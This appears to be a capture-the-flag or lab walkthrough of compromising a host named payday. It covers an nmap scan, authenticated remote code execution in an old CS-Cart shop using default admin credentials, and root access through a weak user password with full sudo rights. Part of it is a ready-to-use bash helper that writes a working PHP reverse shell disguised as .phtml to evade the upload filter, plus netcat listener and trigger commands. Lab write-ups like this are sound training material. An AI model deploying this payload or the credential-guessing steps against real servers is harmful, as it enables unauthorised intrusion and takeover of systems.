$ nmap -p- --min-rate 3000 -Pn 192.168.157.39
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-14 13:42 +08
Nmap scan report for 192.168.157.39
Host is up (0.18s latency).
Not shown: 65527 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
110/tcp open pop3
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
993/tcp open imaps
995/tcp open pop3s
CS-Cart -> RCE
Port 80 was running an old CS-Cart web shop (titled InternetShop), a version with several public exploits:
We can go for the authenticated RCE (EDB-ID 48891), since the admin panel accepts the default credentials admin:admin.
$ cat 48891.txt
get PHP shells from
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
edit IP && PORT
Upload to file manager
change the extension from .php to .phtml
visit http://[victim]/skins/shell.phtml -> Profit. ...!
We can then log into admin.php with the same credentials:
Head to 'Template Editor' and upload the renamed reverse shell (rev.phtml); the file lands under /skins/, which is served by the web root.
Then, just request it:
$ curl http://192.168.157.39/skins/rev.phtml
And we would get a reverse shell:
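The upload step above hinges on one detail: the file manager only blocks the .php extension, but Apache's PHP handler on Debian/Ubuntu builds also executes .phtml. As an added example (not part of the original writeup, and not the pentestmonkey script the exploit text references), the helper below builds a minimal fsockopen-based PHP reverse shell with the .phtml extension and prints the trigger URL. The attacker address 192.168.157.200 and port 4444 in the usage comment are assumptions; the victim address is the one from the scan.

```bash
#!/usr/bin/env bash
# Added example: build the .phtml reverse-shell payload used in the CS-Cart
# Template Editor upload, then print the URL that triggers it.
# The PHP body is a constructed minimal reverse shell for illustration; the
# exploit text uses pentestmonkey's php-reverse-shell, which works the same
# way once its $ip/$port are edited.

# make_payload ATTACKER_IP ATTACKER_PORT OUTFILE
# Refuses anything not ending in .phtml, since that extension is the whole
# point: the upload filter stops ".php", but mod_php's FilesMatch rule
# (".+\.ph(ar|p|tml)$") still hands .phtml to the PHP engine.
make_payload() {
    local ip="$1" port="$2" out="$3"
    case "$out" in
        *.phtml) ;;
        *) echo "refusing: $out must end in .phtml" >&2; return 1 ;;
    esac
    # Unquoted heredoc so $ip/$port expand; PHP variables are escaped.
    cat > "$out" <<EOF
<?php
// constructed minimal reverse shell: connects back to $ip:$port
\$sock = fsockopen("$ip", $port);
if (\$sock === false) { exit("connect failed"); }
// Hand the socket to an interactive sh as stdin/stdout/stderr.
\$proc = proc_open("/bin/sh -i", array(0 => \$sock, 1 => \$sock, 2 => \$sock), \$pipes);
proc_close(\$proc);
EOF
}

# trigger_url VICTIM_HOST FILENAME
# Files uploaded through the Template Editor land in /skins/, which the web
# root serves directly, so a plain GET executes the payload.
trigger_url() {
    printf 'http://%s/skins/%s\n' "$1" "$2"
}

# Usage on the attacker box (addresses 192.168.157.200:4444 are assumed):
#   nc -lvnp 4444 &
#   make_payload 192.168.157.200 4444 rev.phtml   # then upload via Template Editor
#   curl "$(trigger_url 192.168.157.39 rev.phtml)"
```

Keep the listener running before the curl: the PHP process exits as soon as the connect-back fails, and the upload has to be repeated only if the file was deleted, not if the shell simply did not call home.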
Privilege Escalation
Weak Creds -> Root
We can su to the user patrick using the password patrick (same weak-credential pattern as the web admin). This user can run any command via sudo, so a root shell is one sudo away:
patrick@payday:/home$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for patrick:
User patrick may run the following commands on this host:
(ALL) ALL